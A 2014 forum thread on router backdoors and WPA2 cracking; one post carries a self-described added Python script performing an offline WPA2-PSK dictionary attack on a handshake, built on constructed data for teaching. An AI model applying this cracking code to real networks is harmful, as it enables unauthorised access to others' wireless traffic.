# Another router backdoor found!



## remixedcat (Jan 3, 2014)

*Gaping admin access holes found in SoHo routers from Linksys, Netgear and others*



> For many home users, the router-slash-firewall at the edge of their network plays a vital security role.
> 
> It acts as a stockade to keep crooks on the internet at arm's length, typically blocking inbound network connections by default.
> 
> ...



Read more here:
http://nakedsecurity.sophos.com/201...soho-routers-from-linksys-netgear-and-others/

List of affected routers:
http://wikidevi.com/w/index.php?tit...Global+type::~embedded*]]&p=format=broadtable


----------



## newtekie1 (Jan 4, 2014)

I think people are making larger deals out of both of these exploits. They aren't possible from outside of the network, which means you have to let the person on your network before they can exploit them. You should trust the people you let on your network anyway. But even if you do let shady people on your wireless, what is the most they can do by getting access to your router's config page? Reset it to factory defaults, maybe get your wireless key (which they probably already have since you let them on your network)? There isn't much harm that can be done by getting access to the router config; they are already on your network, there are far worse things they could already be doing. You yourself have already made a huge breach in security by allowing them on your network in the first place.


----------



## remixedcat (Jan 4, 2014)

Sometimes going to the WAN IP you can access the router's config page. Depends, really.


----------



## newtekie1 (Jan 4, 2014)

remixedcat said:


> Sometimes going to the WAN IP you can access the router's config page. Depends, really.



In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk (since it opens you up to brute force). And I don't know of any SOHO router that comes with this option enabled by default.

This latest exploit, however, seems like it has to be exploited from the inside, since the listening service that is used by the exploit only listens on the wireless interface.


----------



## silentbogo (Jan 11, 2014)

newtekie1 said:


> In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk (since it opens you up to brute force). And I don't know of any SOHO router that comes with this option enabled by default.
> 
> This latest exploit, however, seems like it has to be exploited from the inside, since the listening service that is used by the exploit only listens on the wireless interface.


You don't have to be trusted by the owner to gain access to the wireless network from the outside.
With tools like aircrack-ng and similar you can get access to any WPA(2)/WEP protected network given enough time and effort.
The potential security risks are enormous: you could monitor traffic, redirect it the way you want, even change the firmware of the router without the knowledge of the owner (how often do you check your router's settings if everything works the way it's supposed to?).


----------



## brandonwh64 (Jan 11, 2014)

newtekie1 said:


> In the case of Joel's backdoor that might be possible, but the user of the router would have to enable remote access, which is another major security risk (since it opens you up to brute force). And I don't know of any SOHO router that comes with this option enabled by default.
> 
> This latest exploit, however, seems like it has to be exploited from the inside, since the listening service that is used by the exploit only listens on the wireless interface.



Yeah, these routers have a new feature where you can sign up at Linksys or Cisco's website and it allows you to configure your router from the internet, kinda like a domain for your home network. I played with one the other day and that was the first thing I disabled for the customer.


----------



## scoutingwraith (Jan 11, 2014)

Hmm. I am a bit lost in this, but will this exploit apply to the DD-WRT firmware I have installed on my Belkin router?


----------



## newtekie1 (Jan 11, 2014)

silentbogo said:


> You don't have to be trusted by the owner to gain access to the wireless network from the outside.
> With tools like aircrack-ng and similar you can get access to any WPA(2)/WEP protected network given enough time and effort.
> The potential security risks are enormous: you could monitor traffic, redirect it the way you want, even change the firmware of the router without the knowledge of the owner (how often do you check your router's settings if everything works the way it's supposed to?).


WEP is pretty easy to crack, but no one should be using that anyway. However, it is no trivial matter to crack WPA(2); the primary cracking tools for WPA actually exploit an issue with WPS (which again you should have turned off), they don't actually crack WPA.

But again, once they have access to your network, there are far worse things they can do than hack your router and change some settings.

I'm in my router viewing the settings pretty much weekly.



scoutingwraith said:


> Hmm. I am a bit lost in this, but will this exploit apply to the DD-WRT firmware I have installed on my Belkin router?



No, the open source firmware shouldn't be affected by this.


----------



## Darr247 (Jan 15, 2014)

silentbogo said:


> With tools like aircrack-ng and similar you can get access to any WPA(2)/WEP protected network given enough time and effort.


Please give us a cite that shows where WPA2 authentication with AES encryption using an 8+ character non-dictionary passphrase has been cracked.
Otherwise, "enough time" means centuries, if not millennia.


----------



## remixedcat (Jan 15, 2014)

Even Fluke Networks has a video how to crack wifi networks.


----------



## Darr247 (Jan 15, 2014)

Fluke has over 200 videos posted on youtube... that's hardly a cite.


----------



## remixedcat (Jan 15, 2014)




----------



## Darr247 (Jan 15, 2014)

That's not a crack; that's a deauthentication attack.
That's the equivalent of saying a Distributed Denial of Service attack is breaking into someone's computer.
Or that squirting all their locks full of epoxy will let you steal someone's car.

Running deauth attacks is just being a twit. I've got a 3 pound engineer's hammer I'd use on whoever's computer running those I tracked down with my TechnoLab mini-yagi...


----------



## remixedcat (Jan 15, 2014)

Well, you can use it to get keys and stuff; it's part of the process though. There are several ways to get the keys and this is one of them.


----------



## silentbogo (Jan 15, 2014)

Once you've captured the 4-way handshake, you have a source to recover the WPA2 password.
WPS not involved, no sledgehammer needed.
There is a better video showing how to hack a WPA2 network using this method:








The only thing that's necessary at this point is a decent set of dictionaries.

I performed the same procedure on my test network, which was protected by an 11-character password (asked my cousin to set one up, to be fair), and it worked with a 2GB+ dictionary.
The only limitation of this hacking technique is that it is viable only for dictionary cracking or small passwords, so if you are using a 13(+)-symbol randomly generated mixed-case alphanumerical passphrase with special chars, you are relatively safe. Other than that, there are hundreds of different configurations of password libraries online, which have existed since the time people were cracking zip archives. I still have a CD with a translit and keyboard-layout based dictionary for Russian passwords lying around somewhere.
Another thing that should be taken into account is GPU processing.
http://www.scmagazineuk.com/wifi-is-no-longer-a-viable-secure-connection/article/119294/
If such a thing was possible in 2008, think what you can do with a modern GPU with 5 to 10 times as many shader processors and a lot more computing power.


----------



## remixedcat (Jan 15, 2014)

It's hard to get a lower priced laptop that has a decent GPU to do that processing though.


----------



## silentbogo (Jan 15, 2014)

You only need a laptop to capture the handshake. Processing could be done at home.


----------



## Darr247 (Jan 15, 2014)

silentbogo said:


> The only thing that's necessary at this point is a decent set of dictionaries.


Except my spec was,
"Please give us a cite that shows where WPA2 authentication with AES encryption using an 8+ character *non-dictionary* passphrase has been cracked."

Personally, I use the MD5 hash of the SHA1 hash of a non-dictionary word for a passphrase.
_e.g._
P1a2s3s4W5o6r7d
SHA1 = b30272e2a576f1d081ac4a4beb123bec5080ad31
MD5 (of SHA1 hash) = 4141de03e086dcf354135800d8c5973e
The only time it's a hassle is when you're associating a device with only an onscreen keyboard (instead of being able to copy+paste from the hash generator directly into wlassistant in linux distros, or WZC interface in windows).
Good luck building a dictionary for that.

I have my doubts about aircrack being able to reverse engineer those vectors even if 5 or more dictionary words are strung together with, say, the last letter of each word capitalized, either. _e.g._ thiS'SAsimplEyeTmostlYsecurEpassphrasE

I think all the apps run in that video are in the fedora security lab (FSL) spin, by the way:
32-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-i686-20.torrent
64-bit - http://torrent.fedoraproject.org/torrents/Fedora-Live-Security-x86_64-20.torrent
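
The dictionary attack silentbogo describes above (capture the 4-way handshake, then test candidate passphrases offline) and the hash-derived passphrase in this post, as an added worked example in Python that is not part of the thread and is not aircrack-ng's code. It reimplements the WPA2-PSK key derivation from IEEE 802.11i: PBKDF2-HMAC-SHA1 over the SSID gives the PMK, PRF-512 gives the PTK whose first 16 bytes are the KCK, and HMAC-SHA1 over the second EAPOL-Key frame gives the MIC that each guess is checked against. Everything "captured" (SSID, MAC addresses, nonces, EAPOL frame) and both wordlists are constructed in the script; `hash_chain_passphrase` is my reading of the MD5-of-SHA1 scheme and assumes MD5 runs over the 40 hex characters of the SHA1 digest, as it would when the hash is pasted into a generator.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example for this thread, not aircrack-ng's code. Every "captured"
value (SSID, MACs, nonces, EAPOL frame) is constructed below so the script
runs offline; the key derivation follows IEEE 802.11i for CCMP
(EAPOL-Key descriptor version 2: HMAC-SHA1 MIC).
"""
import hashlib
import hmac
import math

# Constructed network parameters standing in for what a sniffer would record.
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")    # AP (authenticator) MAC, made up
SPA = bytes.fromhex("66778899aabb")   # client (supplicant) MAC, made up
ANONCE = bytes(range(32))             # AP nonce from message 1, made up
SNONCE = bytes(range(32, 64))         # client nonce from message 2, made up


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the only expensive step per guess, hence the interest in GPUs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC = HMAC-SHA1(KCK, frame with its 16-byte MIC field zeroed)[:16].
    The MIC field sits at offset 81 of an EAPOL-Key frame: 4-byte 802.1X
    header, then descriptor type (1), key info (2), key length (2), replay
    counter (8), nonce (32), IV (16), RSC (8), key ID (8) = 81 bytes."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    body = (b"\x02"             # descriptor type: RSN
            + b"\x01\x0a"       # key info: MIC | pairwise | version 2
            + b"\x00\x10"       # key length 16
            + b"\x00" * 8       # replay counter
            + snonce
            + b"\x00" * 16      # key IV
            + b"\x00" * 8       # key RSC
            + b"\x00" * 8       # key ID
            + b"\x00" * 16      # MIC, filled in by the sender
            + b"\x00\x00")      # key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def capture_handshake(passphrase: str) -> dict:
    """Stand-in for sniffing: the legitimate client builds the real MIC."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    frame = build_eapol_msg2(SNONCE)
    mic = eapol_mic(kck, frame)
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": frame[:81] + mic + frame[97:], "mic": mic}


def crack(hs: dict, wordlist) -> tuple:
    """Try each candidate offline; return (passphrase or None, guesses made)."""
    tried = 0
    for word in wordlist:
        tried += 1
        kck = ptk_from_pmk(pmk_from_passphrase(word, hs["ssid"]),
                           hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return word, tried
    return None, tried


def hash_chain_passphrase(word: str) -> str:
    """The MD5-of-SHA1 scheme as described in the post (assumption: MD5 is
    taken over the 40 hex characters of the SHA1 digest, as a pasted hash would be)."""
    return hashlib.md5(hashlib.sha1(word.encode()).hexdigest().encode()).hexdigest()


def guess_bits(charset_size: int, length: int) -> float:
    """Keyspace in bits for a passphrase drawn uniformly from a charset."""
    return length * math.log2(charset_size)


if __name__ == "__main__":
    hs = capture_handshake("sunshine11")                       # constructed weak passphrase
    print(crack(hs, ["letmein", "qwerty123", "sunshine11"]))  # found on guess 3
    hs = capture_handshake(hash_chain_passphrase("P1a2s3s4W5o6r7d"))
    print(crack(hs, ["P1a2s3s4W5o6r7d"]))                      # the raw seed word fails
    print(crack(hs, map(hash_chain_passphrase, ["hunter2", "P1a2s3s4W5o6r7d"])))  # seed + scheme succeeds
    print(guess_bits(16, 32), guess_bits(26, 11))              # 128.0 bits vs about 51.7 bits
```

The per-guess cost is exactly one PBKDF2 call (4096 HMAC-SHA1 rounds) plus two cheap HMACs, which is what the GPU figures in the thread are about: the capture is done once, the guessing runs as fast as the hardware can derive PMKs. `guess_bits` gives the keyspace of a passphrase drawn uniformly from a charset, which is the number that makes a long random passphrase safe against this attack; a passphrase produced by a fixed transformation of a guessable seed word is only as large a keyspace as the seed, since an attacker who guesses the transformation can apply it to a wordlist, as the last `crack` call in the demo shows.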


----------



## remixedcat (Jan 15, 2014)

Since you know soooo muuuch about this you must know of a tool better than aircrack-ng???


----------



## Darr247 (Jan 15, 2014)

What's your budget?


----------



## remixedcat (Jan 15, 2014)

Ummmmm, like 20 dollars at most right now.


----------



## Darr247 (Jan 16, 2014)

Then, no.

If you had said "unlimited" then I would've said
Cascade Pilot Personal Edition and an
AirPcap Nx 3-Pack.


----------

